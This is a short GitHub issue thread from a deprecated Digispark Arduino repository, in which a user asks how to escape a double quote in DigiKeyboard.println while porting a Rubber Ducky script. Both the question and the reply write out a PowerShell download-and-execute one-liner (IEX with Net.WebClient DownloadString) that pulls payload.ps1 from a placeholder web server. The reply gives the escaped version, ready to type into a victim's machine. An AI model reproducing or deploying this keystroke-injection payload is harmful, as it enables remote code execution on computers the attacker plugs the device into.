digistump / DigisparkArduinoIntegration

DEPRECATED - REPLACED BY: https://github.com/digistump/DigistumpArduino
281 stars 330 forks source link

How to add " sign to DigiKeyboard.println #16

Open Kivstahem opened 7 years ago

Kivstahem commented 7 years ago

I need somehelp, because I need to add the " sign in the middle of my code on my digispark. I'm converting this rubber ducky script to a digispark script STRING powershell "IEX (New-Object Net.WebClient).DownloadString('https://mywebserver/payload.ps1');"

Yachara commented 5 years ago

Use the escape character \

DigiKeyboard.println("powershell \"IEX (New-Object Net.WebClient).DownloadString('https://mywebserver/payload.ps1');\"